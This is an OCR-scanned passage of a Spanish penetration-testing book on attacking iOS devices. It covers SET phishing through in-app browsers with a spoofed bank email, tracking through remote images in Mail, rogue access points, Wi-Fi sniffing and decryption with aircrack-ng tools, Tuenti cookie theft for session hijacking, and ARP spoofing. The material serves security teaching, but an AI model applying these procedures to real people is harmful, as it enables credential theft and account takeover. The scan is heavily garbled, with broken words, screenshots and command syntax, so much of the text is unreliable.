[PARÁN: scribe_log= 

POSSIBLE USERNAME FIELD FUUND: redirert_after login=" 
PARAM: authenticity_token=c0f 399460b39989Zab2Zca2210a3f9fe345143d4 
E=] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPURT 


ctima 


Imagen 0917: Credenciales recogidas del phistine 


En esta imagen se puede visualizar como la víctima hace clic sobre el link y accede, desde el 
navegador embebido, al sitio falso de Twitter. Además, la víctima introduce las credenciales que son 
almacenadas por SET en el mismo instante. 


7.PoC: Hacking con Gmail 


En esta prueba de concepto se utilizará la aplicación de Gmail para ¡OS para realizar un phishing. 
Tal y como se ha explicado en la prueba de concepto con Twitter, la aplicación de Gmail realiza una 
operativa similar al embeber el navegador dentro de la propia aplicación. 


La transición que se explicará entre el correo recibido en la aplicación de Gmail y el navegador 
embchido no refleja ningún dato o sospecha sobre la página que realmente se puede visualizar. Es 
por esta razón que este tipo de aplicaciones es un blanco sencillo para el phishing, ya que ayudarán 
más al atacante que al usuario victima del suceso. 


La idea a realizar en esta prueba de concepto es enviar un correo, ya puede ser masivo en busca de 
gran cantidad de víctimas, con el que un usuario reciba un link que al abrirlo le redirija a la página 
de autenticación de Gmail. De este modo el usuario pensará que la sesión se le ha caducado. Pero es 
mucho más común recibir phishing bancario en el correo, el cual, y gracias a la implementación de 
la aplicación, no levantará sospecha si está realmente cuidado en su estética. 


En primer lugar se utilizará SET 
cualquiera, 


From Name: | Barco Malicioso 

From E-mail: |cortactogibancoWalicioso = m 
To: [icsnmastolssGomaiLcom ] 

Subject: [Reembolso del hanen para ti 

Attachment: | Seleccionar archivo ) nada seleccionado 

Attach another file 

[ Advanced sewags | 

Content-Type: © text/plain 8 texyntml E Editor 

Tet: D E7 u j==== xa ja | 

Soes [efraegah [F] Fontremiy [> rontsue | 

sE =SS«9 e BE agor 

gam | 

mo aà A-2-[x 20 H=/|9 "1 /a 

HA A AO oc AAA 

Querido cilente, 


Este es un mensaje conde se le indica que se le reembolsará dinero debido a un 
premio que ha ganado con Banco Malicioso, el banco que piensa en 3. 


nttp://tinyurl.com/hancoMalicioso 


Gracias por confiar en nosotras! 


Imagen 09.18: Correo spoufeado para el phishing 
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Una vez enviado el correo y de tener preparado SET con el sitio web clonado y preparado para recibir 
la petición de las victimas habrá que esperar a que éstas caigan en el phishing que se ha creado. 
El correo electrónico debe ser lo más creíble posible, incluso siendo interesante la posibilidad de 
incorporar imágenes que puedan proporcionar confianza a la víctima de que realmente el correo es 
real. 


En la siguiente imagen se puede visualizar como cl correo que llega tiene el dominio bancoMalicioso, 
siendo este cambiado en un caso real por la entidad que se quiera. Si el correo electrónico es lo más 
real posible, existe gran cantidad de posibilidades de que no se considere spam y llegue a la bandeja 
de entrada del usuario, 

econ arta | ali" | Particulares, 
Ceuta detales 


w Ma 


Fecha: 10 de enero de 2013, 22:44 


Querido cliente, 


Este es un mensaje donde se le indica que 
se le reembolsará dinero debido a un premio 
que ha ganado con Baco Malicioso, ol 
banao que piensa en li. 


http//tinyurl.com/bancoMalicioso 


Gracias por confiar en nosotros! 


Imagen 09.19: Acceso al sitio web falso sin barra de direcciones 
En la parte derecha zen se puede visualizar tras pulsar sobre el link incorporado en el mail 
falso, accede al sitio web montado con SFT. 


8. PoC: Hacking con Facebook 


Como se ha ido observando a lo largo del capitulo, las aplicaciones más famosas, lanto de redes 
sociales o gestión de correo personal, son vulnerables a ingenicría social. Hacen realmente sencillo 
que un usuario cualquiera caiga cn un phishing, independientemente del nivel de este usuario. 
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La aplicación de Fucebook no se queda atrás e implementa también el mismo fallo de seguridad 
que se ha estudiado en las pruebas de concepto anteriores. Como se puede visualizar en la siguiente 
imagen, cuando un usuario pulsa sobre un /ink que alguien depositó en su muro, se abre la vista 
embebida del navegador, de nuevo, sin la barra de direcciones. 


amma recomienda un artículo 
e e. 


MESES Aia can | rimeines | rrogeracin | Taincian an at | m: 
Mie tomas 
y recomiendo 


A 
|] guste de su programación... Ar 
NL 


RTVE y Cineteca se unen para | | 
apoyas la difusión y la promoció... 
ATEOS a 


RTVE y Cineteca se unen para ap| 
la promoción de los documental 


La sala de cine ubicada en Mat 


Imugen 09.20: Navegador embebido en Facebook sin la barra de direcciones 


El problema radica en el U/Web View, Este componente de desarrollo no implementa la barra de 
direcciones, por lo que es un problema de seguridad. Esta situación ocurre de manera similar con 
el componente equivalente en la plataforma Android, por lo que este tipo de ataques se extiende a 
dicha plataforma. 


9. El correo electrónico en iOS 


Lil cliente de correo electrónico que viene por defecto en el sistema operativo ¡OS dispone de una 
configuración predeverminada que permite la carga de imágenes en mensajes de correo electrónico 
recibidos en formato HTML. 


Esta característica permite a un atacante que envíe un mensaje de correo electrónico personalizado 
cargar una imagen desde una URL que apunte a un servidor controlado. En otras palabras, cuando 
el cliente de correo Mail intente recuperar toda la información del mensaje. realizará una petición 
HTTP al servidor donde se enlaza la imagen. En este servidor preparado se recogerá información 
sensible como se especifica a continuación: 
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cor y la que la víclima se encuentra conectada. Esta dirección puede 
se para geolocalizar al usuario y averiguar su ubicación fisica. 


El User-Agent informará en el servidor malicioso configurado que 
versión del sistema operativo de ¿Phone/iPadiPod Touch se está ejecutando, además de la 
compilación del motor webkit. 


i el cliente de correo electrónico se conecta a Internet a 
través de una operadora GPRS/3G, cl atacante podrá conocer cuál es la compañía de este. 
La dirección IP que se registrará en la petición pertenecerá a un operador de comunicaciones 
concreto. 


Es realmente interesante entender como enviando un correo en formato HTML e insertándole los 
links que se quieran, es decir, un poca de personalización del correo, se puede engañar al cliente 
Mail. Cuando el cliente intente recuperar al contenido de esos /inks realizará peticiones a los sitios 
del hipervínculo, con lo que se recogerá información en un servidor preparado para ello. 


Cabe destacar que se puede conseguir que un dispositivo ¡OS realice peticiones a un servidor de 
exploits preparado con algún exploit para verificar la seguridad del terminal, por lo que esta técnica 
es una vector de ataque muy interesante en el tipo client-side attack para iOS. 


Además, este tipo de técnica y comportamiento podría ser utilizado para forzar a la víctima del 
mail a realizar peticiones que puedan resultar ser ataques contra sistemas vulnerables. Por ejemplo, 
realizar peticiones a variables de un sitio web que puedan ser vulnerables a SQL Injection, tal y como 
se puedo visualizar en la imagen. 


“tonap.orgéncat 9 


CPU OS 42.1 like Mac OG X; es-es) Applelebkit/533.17.Y NIN] 


Los dispositivos de Apple anteriores al ¿Phone 3GS no-disponen de soporte por lo que s 
vulnerables siempre a este tipo de ataques client-side. 


10. Mobile Pwn20wn 


Los exploits no abundan en el mundo de los dispositivos móviles, por ello. cuando se publica alguno 
se crea gran expectación. Lxiste un mercado en el que se mueven grandes cifras económicas, que 
buscan estos exploits para dispositivos móviles. En Amsterdam se celebra una popular competición 
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denominada Pwn20wn. En la edición de 2012 se habló de un exploir para ¡OS 6 el cual mediante 
un Client side attack se podia obtener ciertos datos de interés del dispositivo de manera consistente. 
Este exploit afectaba al navegador móvil Safari y probablemente también se encuentre en el ¿Phone 
5. 


Este exploit se saltaba el código firmado por Apple y la sandbox de Safari. Lo consiguieron 
encadenando distintas técnicas para lograr dicho objetivo. La ejecución del exploit provocaba la 
obtención de la libreta de direcciones, fotografías del usuario, vídeos que se encontrasen alojados en 
el terminal, el historial de navegación. 


Este exploit podría ser utilizado para realizar un Jailbreak al dispositivo, incluso para el ¿Phone 5. 
Los creados del exploit fueron Joost Pool y Daan Keuper. Estos dos investigadores decidieron no 
publicar el exploit y solo realizar la prueba de concepto en este evento. Además, decidieron borrar su 
trabajo deshaciéndose del exploit y la posibilidad de utilizar dicho exploit para realizar, por ejemplo, 
el Jailbreak. Este hecho hace que, posiblemente, el fallo en el webkir de Safari siga existiendo, pero 
el exploit que se aprovecha de dicha vulnerabilidad ya no existe. 


En definitiva, no existe un gran número de exploits públicos que puedan ayudar a los hackers con 
menos recursos a realizar un pentest, pero sí que existe un mercado donde están cotizados, y además, 
existen hackers que tras realizar el trabajo más dificil deciden no publicar; ni vender, dicho exploit. 
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Capítulo X 
Ataques en redes Wi-Fi 


1. Conexión inalámbrica en iOS 


osilivos ¿QS presentan varias formas de conectividad inalámbrica, ya sca por 3G, por 
Bluetooth o por Wireless, (en adelante Wi-Fi). En este capitulo se van a exponer los posibles ataques 
que se puede realizar a un dispositivo ¿QS a través de una conexión Mi-4ri, 


Para comenzar se van a explicar unas nociones sobre como gestionan los. dispositivos ¡OS las 
conexiones Wi-Fi. Si se accede al panel de Ajustes > Wi-Fi, aparece el panel de configuración de 
las redes Wi-1“¡. En dicho panel se pueden realizar las tipicas tareas de configuración y gestión de 
redes, es decir: 


lo que evidentemente permite conectarse 
a una red Wi-/1"í, aunque no es ese el único motivo pura conectarse a una red inalámbrica, ya 


que aumenta la precisión de la localización. 
PA A A las que el dispositivo se conecta 


automáticamente (sin pedir confirmación al usuario), es decir, que una vez que el usuario se 
ha conectado a una red Wi-Fi, ya sca abierta o con contraseña (se introdujo la contraseña la 
primera vez que se conecta a ella), esta red queda almacenada en la lista de conocidas, y a 
partir de ese momento, en cuanto la red está al alcance del dispositivo, y la conexión Wi-Fi 
está activada, el dispositivo se conectará automáticamente. 


- Por último, existe una opción para que el dispositivo pregunte antes de conectarse, en el 
caso de que haya redes al alcance y estas no scan conocidas. 


teniendo en cuenta el funcionamiento de las conexiones Hi-Fi en iOS, se puede preparar un Rogue 
o un punto de acceso falso, con el nombre de una red conocida por el dispositivo, de manera 
se conecte automáticamente, tal y como se ha visto anteriormente. Esto da lugar a una variedad 


iderable de ataques conocidos, como son el MITM o Man In The Middle, hijacking de sesión, 
iffing, etcétera. 


la página siguiente se pueden ver dos imágenes referentes al panel de administración de redes 
-Fi y a la configuración de una de esas redes. 
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Ajustes 


>] Modo Avión 
Wi-Fi DLINK Telefonica > 
Bluetooth 


Compartir Internet | ServicioTecnico... 


a No molestar 


Notificaciones 


Imagen 10.01: Panel de ajustes en ¡0S. Imagen 10.02: Configuración de lu red Wireless 


La conexión de los dispositivos y los Rogue AP 

Existe un vector de ataque clásico, muy conocido, y que en el sisicma operativo ¡OS se puede 
aprovechar, Este vector de ataque es el de la política de conexión de redes Wireless conocidas, el 
cual puede dar como resultado un ataque de tipo Man In The Middle en redes Wi-Fi por medio de 
un Rogue AP. simulando ser la red “habitual” de la conexión. Además. existen una serie de fallos 
de implementación en la gestión de las conexiones Wi-Fi. los cuales pueden ayudar a un alacante a 
oblener resultados exitosos. 


Ll primer fallo que se conoce es la lista de redes conocidas. Cabe destacar que la primera característica 
de falta de seguridad es la no posibilidad de ver qué redes contienen la lista de Wi-Fi que conoce un 
dispositivo ¿OS. Esta lista se encuentra almacenada en un fichero en la ruta ¿private/var/keychains/ 
keychain-2.db. el cual no puede ser visualizado desde ninguna opción del dispositivo. 


La única manera de eliminar una red conocida es encontrarse en el radio de csta y ejecutar la opción 
“olvidar esta red”. La opción de “Preguntar al conectar” solo hace referencia a nuevas redes y no a 
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las redes ya conocidas con anterioridad, por lo que seguirá conectándose de manera automática a las 
redes ya conocidas. 


El segundo fallo conocido es el de la política de conexión a las redes conocidas. Este segundo fallo 
de seguridad se puede explicar ejemplificando el siguiente escenario: 


-  Supóngase un entorno en el que un usuario tiene un alto movimiento geográfico. 


- El usuario se conecta a 20 redes conocidas con asiduidad. 


El sistema operativo ¡OS aplica una política LIFO, Last In Fist Out, para elegir a qué red se conecta 
primero, es decir, la última red conectada es la que tiene mayor prioridad, pero en ningún caso el 
usuario puede configurar dicha política. 


El tercer fallo, y el más importante, hace referencia a la forma que tiene el dispositivo de identificar 
a una red conocida. Esta política ha ido cambiando a lo largo de diferentes versiones del sistema 
operativo. En las versiones inferiores a ¡OS 4.2.4, cl reconocimiento de una red Wi-Fi se realizaba 
solamente por el SSID, es decir, únicamente por el nombre de la red. Esta situación mostraba un gran 
vector de ataque a un usuario malicioso, ya que simplemente con saber el nombre de la red a la que 
el dispositivo suele conectarse, se podría suplantar dicho punto de acceso con una red totalmente 
abierta. Cuando los usuarios de ¡OS con versiones anteriores a la 4.2./ estuvieran en el radio de 
dicha red falsa se conectarian automáticamente. 


Lo realmente interesante es que ante la existencia de las dos redes en el mismo entorno físico, es 
decir, la verdadera y la suplantada, prevalece la que tiene más potencia de señal. 


El cuarto fallo es el reconocimiento de la red por nombre y descripción, pero no por ESSID. Una 
red Wi-Fi puede identificarse por el SSID (nombre), el BSSID (MAC del punto de acceso) o el 
ESSID (Extended SSID) que se utiliza para las redes que tienen más de un AP que da servicio al 
mismo SSID. Por esta razón si en un edificio hay diversos AP con el mismo nombre para la red Wi- 
Fi, el equipo puede ir cambiando de un AP a otro sin pérdida de conexión. Si una red Wireless de 
tipo infraestructura debe ser reconocida por su ESSID, sin embargo en ¡OS, se permite conectar a 
cualquier AP que tenga el mismo SSID y la misma configuración de cifrado y autenticación. Esto 
es un fallo de seguridad que un usuario malintencionado puede utilizar para suplantar un punto de 
acceso o Rogue AP con la misma configuración que el real, conociendo su nombre, su configuración 
y su clave de cifrado. Cualquier usuario conectado a la red conoce la configuración de esta, por lo 
que puede crear el Rogue AP y esperar a que el dispositivo ¿OS se conecte y realizar un MITM. 
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PoC: Suplantación de punto de acceso 
En el siguiente escenario se dispone de los siguientes elementos: 
- Dispositivo ¿OS con una versión inferior a la 4.2.7. 
- Un punto de acceso con nombre STecnico y con configuración de cifrado WPA2-PSK. 


- Un punto de acceso que actuará de Rogue AP sin configuración de cifrado, por lo que será 
una red de tipo abierta. El punto de acceso se configurará con el nombre STecnico. 


El usuario del dispositivo se encuentra conectado al punto de acceso real y trabajando con su 
dispositivo sin ningún tipo de problemas, El atacante tras configurar el punto de acceso se coloca en 
el mismo radio de acción que el otro Access Point, por lo que existen dos dispositivos con el mismo 
SSID en un entorno físico. El que disponga de mayor calidad de señal será el que disponga de la 
asociación con el dispositivo ¡OS. 


una red WPA2, 


¿Cómo se puede conseguir que el dispositivo OS se desasocie del punto de acceso real? Se puede 
esperar a que se aleje de dicho punto de acceso y recoger la señal o utilizar la herramienta airmon-ng 
y aireplay-ng para lograr desautenticar al dispositivo del punto de acceso. Esta acción se estudiará 
más adelante en el presente capítulo. 


Tras realizar dicha acción el dispositivo ¡OS se conecta al punto de acceso falso, gracias a que la 
versión de ¡OS es inferior a la 4.2. / y solo comprueba el SSID para conectarse a las redes Wireless. 


Tmagen 10.05: Dispositivo ¿05 conectado a ua Rogue AP. 
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Si por otro lado el dispositivo dispusiera de una versión superior a la comentada anteriormente 
habría que suplantar la configuración real del punto de acceso. En otras palabras habría que hackear 
la red Wi-Fi o disponer de los datos mediante otra vía. Si la red dispone de cifrado WEP, hackearla 
sería bastante rápido. si la red tuviera cifrado WPA habria que estudiar los distintos casos posibles, 
“omo par ejemplo claves generadas por defecto. cifrado TKIP, compatibilidad con WPS, etcétera, 


2.Sniffing 


El sniffing como tal no es sinónimo de acción maliciosa, ya que un administrador de redes puede 
necesitar analizar el tráfico que circula por una red. Generalmente, cl sniffing sin ninguna técnica 
extra a realizar estaba asociado a las redes concentradas o hubs, las cuales casi han desaparecido, 
pero ¿Cómo se comporta una red Wireless? 


Las redes Wireless de tipo abierta son hubs que permiten a un usuario que se encuentra en el radio 
de acción de la red capturar todo tipo de paquetes que circulan por cl aire, el cual es el medio físico 
de transmisión de la información entre el cliente y el punto de acceso. 


Las redes de tipo abierta no cifran ni protegen con ninguna capa los paquetes que circulan en el 
medio fisico, por lo que un usuario malintencionado que se encuentre en el entorno fisico puede 
capturar el tráfico e interpretarlo. El usuario malintencionado puede configurar una tarjeta Wireless 
en modo monitor para capturar todo el tráfico que circula por el aire, con independencia del número 
de redes que se encuentren en dicho entorno físico. 


El modo monitor y el modo promiscuo son diferentes formas de actuar por parte de una tarjeta de 
red. El modo monitor solo es posible en un adaptador Wireless y permite a un usuario capturar el 
tráfico, ya sea cifrado WEP, WPA o sin cifrado que circula en ci aire. El modo promiscuo permite 
capturar y analizar todo el tráfico que “llega” a la tarjeta de red, (ya sea Ethernel o Wi-Fi), cuando 
el usuario ya se encuentra asociado a dicha red, es decir, cuando dispone de autoridad para estar 
conectado a la misma. 


Conexión a una red Wireless abierta 3 

Como se ha mencionado anteriormente conectarse a una red de tipo abierta tiene sus peligros por 
parte de los usuarios, Existen diversas configuraciones de este tipo de redes, como por ejemplo la de 
instalar un portal cautivo para dar acceso a Internet, aunque el tráfico entre el punto de acceso y el 
cliente va sin ningún tipo de cifrado. Por otro lado un atacante podría utilizar vulnerabilidades de los 
dispositivos iOS, (como se ha mencionado anteriormente), para lograr que uno de estos dispositivos 
se asocie a un Rogue AP. 


Si se utilizará un Rogue AP lo más normal sería que este reparticra dirceción TP, DNS y puerta de 
enlace, siendo esta última una máquina del atacante por donde pasaría todo el tráfico hacia Internet, 
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Realmente no sería necesario esto, ya que simplemente con el hecho de no utilizar cifrado en el 
medio de transmisión, el tráfico puede ser capturado e interpretado. 


El procedimiento para capturar el tráfico de mma red Wireless abierta sería el siguiente: 


- Tarjeta Wireless en modo monitor para capturar todo tipo de tráfico que circule por el aire, 
mediante el uso de la herramicntaldipmon mgn 


- Mediante el uso de la herramienta ziotan na sa pueden “amapar'stodos esos paquetes 
que circulan en el aire, visualizar direcciones MAC de los puntos de acceso, ver máquinas 
asociadas a dichos puntos, visualizar a qué redes Wireless se conectan habitualmente-los 
elientes aunque Ta red no se encuentre en el presente entomo fisico, calidad de lasseñalf 
etcétera, Además, esta herramienta permite yolcar a un fichero.de-tipo-C-AP=el-tráfico 
capturado, para poder ser visualizado y analizado con herramientas como Wireshark, Nenvork 
Miner. etcétera. 

- Además, se pueden utilizar sniffers que filtren y se queden con ciertos campos que puedan 
interesar, como contraseñas, cuukies, etcétera! 


Conexión a una red Wireless de tipo WEP 


Cuando la red es de tipo WEP o incluso WPA, se puede realizar el mismo procedimiento que en 
cl apartado anterior. El único inconveniente que existe es que el tráfico entre el cliente y el punto 
de acceso se envía cifrado. Si el usuario malintencionado emplea tiempo en conseguir la clave de 
acceso a la red o, por cualquier otra razón ya la tiene, puede capturar el tráfico y visualizarlo, sin 
necesidad de asociarse al punto de acceso. Este hecho es interesante, ya que permite al atacante no 
registrar su dirección fisica o cualquier otro dato en el punto de acceso. 


Para realizar el descifrado de paquetes capturados mediante el uso de la contraseña de la red Wi-Fi 
se debe utilizar la herramienta arrdecap-ng. Estautilidad pertencec a la suite de arrerack-ng. 


La operativa a llevar a cabo en esta ocasión y en este escenario es la siguiente: 


- Se dispone de una tarjeta Wireless en modo monitor mediante la herramienta airmon-ng. 
= Con airodump-ng se csplura todo el tráfico que circula por el medio físico, en este caso cl 
aire. Se puede filtrar por bssid. canal, tipo de tráfico. etcétera, 

- Una vez que se dispone de la captura enun fichero CAP, si se visualiza se verian las 
tramas 802.11 sin poder ver qué encapsulan en su interior, a diferencia de lo que ocurre en 
una configuración de red abierta. 

- Para descifrar el tráfico capturado se necesita la contraseña de la red Wireless. Para ello 
se dispone de la herramienta airdecap-ng, cuyo funcionamiento se expone a continuación. 


Airdecap-ng dispone de una sintaxis realmente sencilla y diferente para redes WEP o WPA. Para 
las redes WEP la sintaxis es la siguiente añrecap ag + CLAVE XADECIMAESINPUNTOS: 
<archivo.cap>. El parámetro=windica la clave de la red WEP, la cual debe ser conocida a priori, 
y dehe ser escrita en formato hexadecimal? Para obtener el equivalente a ASCT en hexadecimal se 
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puede utilizar la herramienta xx, por siemoio. A resultado es la 
clave en formato hexadecimal. A continuación se le puede pasar a airdecap-ng la clave y el fichero 


CAP. 


Para las redes WPA, la sintaxis es la siguiente cirdecap-1ng —e <nombre de la red o SSID> -p <clave 
red WPA> <fichero CAP>. Se necesita el handshake capturado con airodump-ng. Hay que recordar 
que el handshake se puede conseguir en la autenticación de un cliente con un punto de acceso. 


Una vez que se dispone del archivo CAP descifrado, se puede investigar cl tráfico en plano y obtener 
información confidencial de la víctima. 


a-pe capturas para analizar]$ 21700cop ng E wireless -p 
er of packets read 3455 

otal nunbar of MER data packets e 

olal number of WPA data packets una 

mber of plaintext data packets 17 


mber ol decrypted WEP packets 0 
mber of corrupted WEP packets 6 
aber of decrypted WPA_packe E 


Además, con esta lócnica se puede realizar un bypass ante un DHCP deshabilitado y conocer el 
rango de direcciones IP válido para dicha red. a 


PoC: Hijacking a tuenti en redes Wireless 
En lu siguiente prueba de concepto se prepara el siguiente escenario: 


- Una victima con dispositivo ¿OS y que se encuentre conectado a una red de tipo abierta 
o que se encuentre conectado a un Rogue AP preparado por un atacante, con configuración 
de red abierta. 


- La aplicación utilizada por la víctima es la propia de tuenti para iOS. Esta aplicación 
manda la cookie de manera distinta a como se realizaría por el navegador Safari, pero la 
cookie es igual. 

- Un atacante con una tarjeta Wireless en modo monitor y volcando lo capturado en un 
fichero CAP. 


A continuación se pasa a detallar la prueba de concepto de un robo de sesión de tuenti, de un usuario 
que accede a través de ¡OS, teniendo en cuenta que el usuario se ha conectado previamente a un 
punto de acceso malicioso controlado por el atacante, o estando la red abierta o sin contraseña, o 
contraseña WEP conocida por el atacante, o en algunos casos también con WPA (siempre que se 
conozca la clave). 


Una vez que la victima se ha concetado al punto de acceso malicioso, se puede poner la tarjeta Wi-Fi 
del equipo atacante en modo monitor con airmon-ng, tal y como se puede apreciar en la siguiente 
imagen. 
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ound 2 processes that could cause trouble. 
f airodump-ng, alreplay-ng or airtun ng stops working after 
of time, you may want to kill (some of) them! 


Mane 

dhclienta 

dhclienta 

with PID 1981 (ifup) is running on interface wlana 


Process with PID 2618 (dhclient3) is running on interface wlan8 


nterface Chipset Driver 


ano Ralink 2573 U; Ipi 
modi 


'Iras realizar el mencionado cambio de modo en la tarjeta Wireless, el atacante estará en disposición 
de lanzar la aplicación airodump-ng, con la que será capaz de ir capturando el tráfico que está 
circulando por el aire. 


La siguiente tabla mucstra una lista con los parámetros más interesantes de dicha herramienta, y su 
descripción correspondiente. 


Parámetro Descripción 


-c Viltra por el canal indicado, recogiendo solo paquetes de los puntos de acceso que 
trabajan en el canal especificado. 


w5 Vuelca el contenido capturado en un fichero CAP. a 
beacons Almacena los beacons, que por defecto no son almacenados. 


--ivs Almacena solo los IVS. 


El atacante lanzará la siguiente instrucción para capturar el tráfico. siempre y cuando la interfaz de 
tipo monitor que haya creado airmon-ng sea mon0: 


Tras realizar esta operativa durante unos minutos, se dispone de un fichero CAP el cual puede ir 
siendo analizado. Con Wireshark sc analiza dicho fichero en busca de la cookie de tuenti de la 
víctima, ya que recordando el escenario. la comunicación entre el punto de acceso y el dispositivo 
iOS va sin cifrar. 


Utilizando un filtro de ¿2 nr no pueden filtrar 
los paquetes que realmente interesan de la captura realizada, tal y como se puede visualizar en la 


siguiente imagen. 
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prueba-01.cap [Wireshark 1.8. Unknown fram unknown) 


E E 265 POST /api? WTTP/L.1 (application/x-m- 
B01 30.212484 : : wae 352 POST /api/ WTTP/1.1 (applicat ion/x- wa 
813 30.252932 158 131.168. É AEL POST /api/ HTTP/1.1 (applicotton/x-wwt-fo 
HN 30.356068 192,158. 58 POST /api/ HTTP/I.L (application/x-ww fo 
905 31.820916 A 7 1m 1015 POST /api/ WTIP/1.1 (application/x-ww-: 


Imagen 10.08: Capmra de rookie de tuenti en iOS. 


Gracias a esta técnica y a la configuración del entorno es posible capturar credenciales o cookie: 
necesidad de realizar un 427 Spoofing, ya que el punto de acceso no tiene ningún tipo de cifrado con 
los clientes asociados. Para evitar dicha situación sería recomendable utilizar un cifrado, evitando el 
citrado WEP, ya que este es fácilmente atacable. 


Una vez que se ha obtenido la cookie de tuenti es posible acceder a la cuenta de la víctima, cuya 
sesión ha sido capturada, Pare ello basta con utilizar una aplicación que permita gestionar cookies) 
como por ejemplo Cookies Manager! , el cual es un plugin de Firefox que permite realizar dicha 
acción En la siguiente imagen se puede visualizar la configuración de la cookie extraída de la 
captura analizada con Wireshark. 


Edit Cor ES 


Nombre Y] sd 
Corterido: Z) Te QEAAAAAER AO Fo al TAI 
MZ 
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Hip Unie W) piia) 
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Imagen 10.09: Confienación de la cookie suplantada de frezzi. 


Después de realizar dicha acci 
en el navegador Firefox! 
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Imagen 10.10: Suplantación de la cuenta de fuen. 


3. Man in the middle 


Generalmente, la técnica de Man In The Middle es asociada por los usuarios con ARP Spoofing, pero 
MITM no es solo este tipo de técnica. Como se ha ido estudiando el MITM es posible realizarlo en 
otras capas, por ejemplo mediante un Rogue AP. 


Como definición h: 


De este modo, 
atacante puede analizar el tráfico y proceder a utilizar dicha información en su beneficio. 


Los dispositivos ¿OS también pueden caer en estas técnicas de MITM como se ha ido estudiando. 
A continuación se detallarán vías para realizar ataques del tipo MITM sobre los dispositivos iOS. 


ARP Spoofing 


Este tipo de ataques se realiza cuando el dispositivo ¡OS y el atacante se encuentran en la misma red, 
por ejemplo, a través de una LAN, la cual dispone de ur punto de acceso inalámbrico. 


El ataque está basado en el protocolo con el que los dispositivos 
de unared conocen a los otros elementos isma. Se debe partir de la base de que los dispositivos, 
como equipos, smartphones, switches, routers, etcétera, se comunican en una LAN a través del 
nivel de enlace. Es decir, necesitan conocer las direcciones físicas de los elementos de la red. El 


protocolo ARP permite a los elementos de una red conocer la dirección fisica del resto, partiendo del 
conocimiento de una dirección IP. 


Fn resumen, Man In The Middle cs un ataque en el que el atacante crea la posibilidad de leer, 
inyectar o modificar información que hay en un canal entre 2 máquinas sin que ninguna de esas 
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máquinas conozca esta situación. Ln otras palabras, un usuario con malas intenciones, se colocará 
entre el equipo 1 y el equipo 2. Cuando el equipo 1 envie tráfico al equipo 2, dicho tráfico pasará por 
el equipo del atacante en primer lugar. 


Jn paquete request pregunta 
mediante broadcast a todos los elementos de la red por la dirección fisica que tiene una dirección 
TP conercta. El elemento que tenga dicha dirección IP contestará con un ARP reply indicando su 
dirección fisica en la cabecera. De este modo los equipos aprenden a asociar direcciones fisicas a 
direcciones IP. Si un usuario malintencionado utilizara los ARP reply, para engañar y envenenar 
las tablas de otros elementos se podría capturar el tráfico que no es dirigido para dicho usuario 
malicioso. 


Como ejemplo se escenifica la siguiente situación, un atacante utilizará alguna herramienta, como 
puede ser cain, eltercup o urpspouf, para llevar a cabo el arp spoofing. El atacante envenenará 
las tablas ARP de las víctimas, enviando mensajes ARP “engañando” a los objetivos. Este tipo de 
ataques se realiza en redes con switches (conmutadas), ya que en redes con hubs no es necesario. 


El estado inicial de la tabla ARP del dispositivo ¿OS, con dirección IP 10.0.0.3, tiene el siguiente 
aspecto: 


Dirección LP Dirección MAC 
10.0.0.1 (router) | CA:FE:CA:FE:CA:FE 


Ll estado inicial de la tabla ARP del router, con dirección 1P 10.0.0.1, tiene el siguiente aspecto: 


IP_ | Dirección MAC 


El atacante enviará un par de arp reply, uno al dispositivo ¿OS y otro al router, con la intención 
de envenenar y falscar la información anterior. Si el atacante dispone de la dirección MAC 
AA:BB:AA:BB:AA:BB, las tablas ARP de los elementos anteriores quedarán de la forma que se 
muestra a continuación: 


10.0.0.1 (router) | AA:BB:AA:BB:AA:BB 


Dirección 1P a MAC 


El estado inicial de la tabla ARP del rowter, con dirección IP 10.0.0.1, tiene el siguiente aspecto: 


Dirección IP_| Dirección MAC 
10.0.0.3 AA:BB:AA:BB:AA:BB 
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Algo que hay que tener en cuenta y que ha causado problemas a muchos auditores y usuarios 
malintencionados es cl comportamiento de los dispositivos móviles en general, e ¿OS en particular, 
frente a la técnica arp spoofing. 


Redes abiertas o WEP 


La conexión a redes de tipo abiertas o con cifrado WLP es prácticamente similar. La única diferencia 
es el cifrado con el que se protegen los paquetes que circulan por el aire. Realmente realizar un arp 
spoofing o sniffar el tráfico de una de estas dos redes, cs indiferente, ¿Esto a qué es debido? 


si 


Si cl atacante se enfrenta a una red abierta, puede capturar el tráfico simplemente “observando” 
el aire con airodump-ng, mientras que a la vez se puede conectar al punto de acceso abierto y 
realizar un MITM. El resultado es el mismo, aunque no quedan huellas de dicha acción si se realiza 
capturando o saifíando el tráfico del aire. 


Si por el contrario el atacante se enfrenta a una red con cifrado WEP, se puede realizar un MITM 
si se dispone de la clave y se encuentra conectado a la red. o bien, se puede capturar el tráfico que 
circula por cl aire y después utilizar airdecap-1g para descifrarlo. En-aíbos casos se necesita la 
clave de acceso a la red Wireless, por lo que el resultado vuelve a ser cl mismo, aunque de nuevo con 
la técnica proporcionada por «irdecap-ng no quedan huellas de la acción. 


Redes Y 


surge como una solución temporal de la Wi-Fi Alliance para 
securizar las redes Wireless una vez que quedó de manifiesto la debilidad de WEP (Wired Equivalent 
Privacy). Mientras IEEE trabajaba en el estándar IEEE 802.11i, cuando salió a la luz la Wi-Fi 
Alliance proporcionó la certificación WPA2 a todos aquellos dispositivos que cumplían con las 
especificaciones marcadas por el nuevo estándar. Ambas soluciones, WPA y WPA2, soportan el 


protocolo 802.1x para la autenticación en ámbitos empresariales y la autenticación e 
compartida PSA Ko) els entom y 


ámbitos domésticos. 


WPA y WPA2 se diferencian poco conceptualmente y difieren principalmente en el algoritmo de 
cifrado que emplean. Mientras que WPA basa el cifrado de las comunicaciones en el uso del algoritmo 
ue está basado en RC4 al igual que WEP, WPA2 
utiliza CCM; basado en 
La segunda «hiferencia notable se encuentra en el algoritmo utilizado para controlar la integri 


del mensa; PA usa una versión menos elaborada para la gencración del código 
o código “Michael”, WPA2 implementa una versión mejorada de MIC, 


Para entender mejor cómo poder realizar un ataque a este tipo de redes, primero se ha de analizar el 
proceso de asociación de un cliente a la red Wireless. Independientemente del sistema de seguridad 
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que se elija para la red (WEP, WPA-PSK, WPA2-PSK), el proceso es el mismo. Este proceso tendrá 
dos o tres fases dependiendo de si el punto de acceso está emitiendo tramas “Beacon frame”. Si se 
están emitiendo tramas “Beacon frame”. el cliente se conecta a la red en dos fases, una primera fase 
de autenticación, que podrá estar abierta o con clave compartida, y una segunda fase de asociación. 


En el caso de que no se estén emitiendo tramas “Beacon frame”, existe una fase de prueba inicial 
